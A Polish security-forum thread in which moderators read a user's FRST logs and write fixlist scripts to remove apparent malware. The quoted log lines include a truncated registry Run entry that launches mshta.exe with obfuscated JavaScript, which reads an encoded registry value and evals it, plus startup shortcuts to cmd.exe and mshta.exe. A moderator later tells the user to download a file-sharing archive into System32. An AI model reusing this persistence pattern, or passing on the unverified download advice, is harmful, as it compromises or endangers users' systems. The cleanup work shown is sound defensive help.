TA STRONA UŻYWA COOKIE. Dowiedz się więcej o celu ich używania i zmianie ustawień cookie w przeglądarce. Korzystając ze strony wyrażasz zgodę na używanie cookie, zgodnie z aktualnymi ustawieniami przeglądarki.
Od dnia 25.05.2018 r. na terenie Unii Europejskiej wchodzi w życie Rozporządzenie Parlamentu Europejskiego w sprawie ochrony danych osobowych. Prosimy o zapoznanie się z polityką prywatności oraz regulaminem serwisu  [X]

Wolny start i ogolne sprawdzenie systemu

Logi, zabezpieczenie komputera, danych. Programy antywirusowe antyspyware, firewall itp.
Regulamin forum
1. Każdy temat powinien odzwierciedlać treść wątku.
2. W przypadku wklejania logów; należy je wykonać od razu przynajmniej z dwóch narzędzi: FRST oraz z GMER
3. Wszelkie logi proszę publikować na przeznaczonych do tego stronach a w poście wklejać tylko link.
4. Nie wskazane jest skracanie logów, należy wkleić cały - od początku, do końca.
5. Nie wskazane jest podczepianie się do tematów innych użytkowników - proszę założyć nowy temat w dziale Bezpieczeństwo, ułatwi to pomoc sprawdzającemu.
6. Osoby nie posiadające odpowiedniej wiedzy, nie powinny sprawdzać logów, ponieważ grozi to poważnym uszkodzeniem systemu lub aplikacji zainstalowanych na komputerze.
7. Należy dokładnie opisać problem, występujące objawy oraz wszelkie podjęte działania.
8. Każdy skrypt jest unikatowy, napisany dla każdego przypadku z osobna, więc nie może być stosowany przez innych.
9. W przypadku zamieszczenia zrzutu ekranu (screenshot'a) proszę korzystać z zewnętrznego serwisu oferującego hosting zdjęć.

Wolny start i ogolne sprawdzenie systemu

Postprzez Drusss » 22 Wrz 2016, 17:16

PostUA: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 OPR/39.0.2256.71


Cześć, proszę o przejrzenie logów.

Dość wolno uruchamia się. Przy okazji rzucenie okiem czy wszystko jest ok.
Dla mnie napewno startować wraz z windowsem powinny :
lenovo mouse driver,
MSI afterburn,
Nvidia

Logi :
Gmer : Zablokowany Deamon Deffogerem.
http://www.wklej.eu/index.php?id=c7bfdaa49f

FRST :
http://www.wklej.eu/index.php?id=76cc5db2a0
Addition :
http://www.wklej.eu/index.php?id=e4aec45a20
Shortcut :
http://www.wklej.eu/index.php?id=03d5151927

Dziękuję z góry za pomoc i czekam na odpowiedz.
Pozdrawiam.
Intel Core i5-2500K + Noctua NH-D14
MSI P67A-C45
DDR3 20GB A-Data (2x2GB) Gaming / Corsair Vengeance LP (2x8GB)
Gigabyte GeForce GTX 560 Ti OC 1GB DDR5 + Arctic Cooling Accelero Xtreme Plus II
Seagate 1 TB 7200rpm 32MB cache SATAII Barracuda 7200.12
Samsung SH-S223C SATA
Fractal Design ARC + 5x Noise Blocker PK3 140mm + Lamptron FC Touch Fan Controller
Seasonic S12II-520 520W 80 Plus Bronze
Drusss
Postujący
Postujący
 
Posty: 336
Dołączenie: 14 Lip 2005, 19:13

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez mateo8898 » 22 Wrz 2016, 18:15

PostUA: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0


Znasz te skróty w autostarcie:
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7174b.lnk [2016-08-30]
ShortcutTarget: d7174b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb517.lnk [2016-09-22]
ShortcutTarget: fdb517.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)

??

Wklej do notatnika:
Shortcut: C:\Users\Druss\AppData\Local\af175b\aeeed0.lnk -> C:\Users\Druss\AppData\Local\af175b\f97d51.bat ()
C:\Users\Druss\AppData\Local\af175b\f97d51.bat
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2004-06-16] (InstallShield Software Corporation)
HKLM-x32\...\RunOnce: [DelLiveinst] => cmd.exe /c del /f /s /q /a "C:\MSI\LiveUpdate\DL_FILE\Live_Update_6_6.1.021\Liveinst.exe"
HKU\S-1-5-21-545208581-4026403909-1888401867-1000\...\Run: [ISUSPM Startup] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\ISUSPM.exe [221184 2004-06-16] (InstallShield Software Corporation)
HKU\S-1-5-21-545208581-4026403909-1888401867-1000\...\Run: [**ottghb<*>] => "C:\Windows\system32\mshta.exe" javascript:MHhr0zmT="c7cwi";dJ7=new%20ActiveXObject("WScript.Shell");X0IAtp="5XyzQ";Ny66ql=dJ7.RegRead("HKCU\\software\\vwiqzajzvw\\tgjoqptttg");QZ5Cjn0="Mblkd";eval(Ny (the data entry has 23 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-545208581-4026403909-1888401867-1000\...\Run: [**lxoryrm<*>] => "C:\Users\Druss\AppData\Local\af175b\aeeed0.lnk" <===== ATTENTION (Value Name with invalid characters)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll => No File
StartMenuInternet: (HKLM) Opera - C:\Program Files (x86)\Opera\Opera.exe hxxp://www.istartpageing.com/?type=sc&ts=1451824932&z=a1be006e498563d8d2210bbgezdw3geb5o7z7t9c5o&from=cmi&uid=ST31000528AS_9VP8WG28XXXX9VP8WG28
S4 AdobeARMservice; "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" [X]
S3 NTIOLib_1_0_9; \??\C:\Users\Druss\Desktop\1.0.3\NTIOLib_X64.sys [X]
R3 NTIOLib_MSISMB_CC; \??\C:\Program Files (x86)\MSI\ControlCenter\Sleep\NTIOLib_X64.sys [X]
S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X]
U3 kgloapoc; \??\C:\Users\Druss\AppData\Local\Temp\kgloapoc.sys [X]
FF DefaultSearchEngine: istartpageing
EmptyTemp:

Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Następnie podaj nowe logi z FRST.
Awatar użytkownika
mateo8898
Moderator
Moderator
 
Posty: 15377
Dołączenie: 15 Maj 2009, 14:55
Pochwały: 966

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez Drusss » 22 Wrz 2016, 18:31

PostUA: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0


Nie wiem co to.
Jeśli to jakieś śmiecie to usuwamy.

Fixlog :
http://www.wklej.eu/index.php?id=8559b702ee

A dodatkowo, stara sprawa, po ostatnim czyszczeniu tutaj pozostał mi błąd który w sumie olewałem ale teraz jest okazja się może go pozbyć :
Image

Pokazuje się po każdym włączeniu/restarcie kompa.
Nie mogę znalesc tego tematu w dziale bezpieczeństwo. Nie wiem gdzie on jest... Ale logi zawsze robię i sprawdzam tutaj.
Intel Core i5-2500K + Noctua NH-D14
MSI P67A-C45
DDR3 20GB A-Data (2x2GB) Gaming / Corsair Vengeance LP (2x8GB)
Gigabyte GeForce GTX 560 Ti OC 1GB DDR5 + Arctic Cooling Accelero Xtreme Plus II
Seagate 1 TB 7200rpm 32MB cache SATAII Barracuda 7200.12
Samsung SH-S223C SATA
Fractal Design ARC + 5x Noise Blocker PK3 140mm + Lamptron FC Touch Fan Controller
Seasonic S12II-520 520W 80 Plus Bronze
Drusss
Postujący
Postujący
 
Posty: 336
Dołączenie: 14 Lip 2005, 19:13

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez filutka78 » 26 Wrz 2016, 16:15

PostUA: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0 SeaMonkey/2.40


Pokazuje się po każdym włączeniu/restarcie kompa.

Otwórz Notatnik i wklej w nim:
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).
.
filutka78
Forumowicz
Forumowicz
 
Posty: 48
Dołączenie: 18 Maj 2010, 16:51
Pochwały: 13

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez mateo8898 » 28 Wrz 2016, 19:09

PostUA: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0


Wklej do notatnika:
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7174b.lnk [2016-08-30]
ShortcutTarget: d7174b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb517.lnk [2016-09-22]
ShortcutTarget: fdb517.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)

Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Następnie podaj nowe logi z FRST.
Awatar użytkownika
mateo8898
Moderator
Moderator
 
Posty: 15377
Dołączenie: 15 Maj 2009, 14:55
Pochwały: 966

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez Drusss » 29 Wrz 2016, 11:41

PostUA: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0


Intel Core i5-2500K + Noctua NH-D14
MSI P67A-C45
DDR3 20GB A-Data (2x2GB) Gaming / Corsair Vengeance LP (2x8GB)
Gigabyte GeForce GTX 560 Ti OC 1GB DDR5 + Arctic Cooling Accelero Xtreme Plus II
Seagate 1 TB 7200rpm 32MB cache SATAII Barracuda 7200.12
Samsung SH-S223C SATA
Fractal Design ARC + 5x Noise Blocker PK3 140mm + Lamptron FC Touch Fan Controller
Seasonic S12II-520 520W 80 Plus Bronze
Drusss
Postujący
Postujący
 
Posty: 336
Dołączenie: 14 Lip 2005, 19:13

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez mateo8898 » 29 Wrz 2016, 15:14

PostUA: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0


Troszkę się zagalopowałem, 2 pliki trzeba przywrócić z kwarantanny, więc wklej do notatnika:
RestoreQuarantine: C:\FRST\Quarantine\C:\Windows\System32\cmd.exe
RestoreQuarantine: C:\FRST\Quarantine\C:\Windows\System32\mshta.exe

Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Awatar użytkownika
mateo8898
Moderator
Moderator
 
Posty: 15377
Dołączenie: 15 Maj 2009, 14:55
Pochwały: 966

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez Drusss » 02 Paź 2016, 13:22

PostUA: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0


Intel Core i5-2500K + Noctua NH-D14
MSI P67A-C45
DDR3 20GB A-Data (2x2GB) Gaming / Corsair Vengeance LP (2x8GB)
Gigabyte GeForce GTX 560 Ti OC 1GB DDR5 + Arctic Cooling Accelero Xtreme Plus II
Seagate 1 TB 7200rpm 32MB cache SATAII Barracuda 7200.12
Samsung SH-S223C SATA
Fractal Design ARC + 5x Noise Blocker PK3 140mm + Lamptron FC Touch Fan Controller
Seasonic S12II-520 520W 80 Plus Bronze
Drusss
Postujący
Postujący
 
Posty: 336
Dołączenie: 14 Lip 2005, 19:13

Re: Wolny start i ogolne sprawdzenie systemu

Postprzez mateo8898 » 04 Paź 2016, 11:56

PostUA: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0


Pobierz ten plik -> http://www34.zippyshare.com/v/9ghdVfrz/file.html i wypakuj do C:\Windows\System32

Napisz jak w ogóle sytuacja.
Awatar użytkownika
mateo8898
Moderator
Moderator
 
Posty: 15377
Dołączenie: 15 Maj 2009, 14:55
Pochwały: 966


Powróć do Bezpieczeństwo

Kto jest na forum

Zarejestrowani użytkownicy: Brak zarejestrowanych użytkowników

cron